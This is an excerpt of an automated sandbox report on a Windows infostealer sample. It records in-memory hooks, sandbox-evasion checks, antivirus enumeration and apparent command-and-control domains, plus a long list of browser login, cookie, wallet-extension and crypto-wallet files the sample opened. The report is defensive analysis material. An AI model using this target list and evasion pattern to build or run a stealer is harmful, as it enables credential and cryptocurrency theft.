              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeMemory written: PID: 7508 base: 75BF4D90 value: E9 7A B2 FA 8A Jump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeMemory written: PID: 7508 base: BB0005 value: E9 EB EB 05 75 Jump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeMemory written: PID: 7508 base: 75C0EBF0 value: E9 1A 14 FA 8A Jump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeMemory written: PID: 7508 base: BC0005 value: E9 8B 8A 41 74 Jump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeMemory written: PID: 7508 base: 74FD8A90 value: E9 7A 75 BE 8B Jump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeMemory written: PID: 7508 base: BD0005 value: E9 2B 02 43 74 Jump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeMemory written: PID: 7508 base: 75000230 value: E9 DA FD BC 8B Jump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

              Malware Analysis System Evasion

              barindex
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeSystem information queried: FirmwareTableInformationJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exe TID: 7560Thread sleep time: -120000s >= -30000sJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exe TID: 7580Thread sleep time: -30000s >= -30000sJump to behavior
              Source: RrHuyQ4GzG.exe, 00000000.00000002.1804369295.0000000000C91000.00000004.00000020.00020000.00000000.sdmp, RrHuyQ4GzG.exe, 00000000.00000002.1804369295.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, RrHuyQ4GzG.exe, 00000000.00000003.1716421679.0000000000C91000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeProcess information queried: ProcessInformationJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Source: RrHuyQ4GzG.exe, 00000000.00000002.1804683141.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: demonstationfukewko.shop
              Source: RrHuyQ4GzG.exe, 00000000.00000002.1804683141.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: liabilitynighstjsko.shop
              Source: RrHuyQ4GzG.exe, 00000000.00000002.1804683141.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: alcojoldwograpciw.shop
              Source: RrHuyQ4GzG.exe, 00000000.00000002.1804683141.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: incredibleextedwj.shop
              Source: RrHuyQ4GzG.exe, 00000000.00000002.1804683141.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: shortsvelventysjo.shop
              Source: RrHuyQ4GzG.exe, 00000000.00000002.1804683141.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: shatterbreathepsw.shop
              Source: RrHuyQ4GzG.exe, 00000000.00000002.1804683141.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: tolerateilusidjukl.shop
              Source: RrHuyQ4GzG.exe, 00000000.00000002.1804683141.0000000000F9C000.00000002.00000001.01000000.00000003.sdmpString found in binary or memory: productivelookewr.shop
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
              Source: RrHuyQ4GzG.exe, 00000000.00000002.1804369295.0000000000C5A000.00000004.00000020.00020000.00000000.sdmp, RrHuyQ4GzG.exe, 00000000.00000003.1765493658.0000000000CED000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

              Stealing of Sensitive Information

              barindex
              Source: Yara matchFile source: Process Memory Space: RrHuyQ4GzG.exe PID: 7508, type: MEMORYSTR
              Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
              Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
              Source: RrHuyQ4GzG.exe, 00000000.00000002.1804369295.0000000000C91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
              Source: RrHuyQ4GzG.exe, 00000000.00000002.1804369295.0000000000C91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
              Source: RrHuyQ4GzG.exe, 00000000.00000002.1804369295.0000000000C91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/JAXX New Version
              Source: RrHuyQ4GzG.exe, 00000000.00000002.1804369295.0000000000C91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
              Source: RrHuyQ4GzG.exe, 00000000.00000002.1804369295.0000000000C91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
              Source: RrHuyQ4GzG.exe, 00000000.00000002.1804189179.0000000000967000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: Wallets/BinanceC:\Users\user\AppData\Roaming\Binance
              Source: RrHuyQ4GzG.exe, 00000000.00000002.1804369295.0000000000C91000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Ethereum
              Source: RrHuyQ4GzG.exe, 00000000.00000002.1804369295.0000000000C6F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %localappdata%\Coinomi\Coinomi\wallets
              Source: RrHuyQ4GzG.exe, 00000000.00000002.1804369295.0000000000C38000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: keystore
              Source: RrHuyQ4GzG.exe, 00000000.00000002.1804189179.0000000000967000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: C:\Users\user\AppData\Roaming\Ledger Live+g@
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
              Source: C:\Users\user\Desktop\RrHuyQ4GzG.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
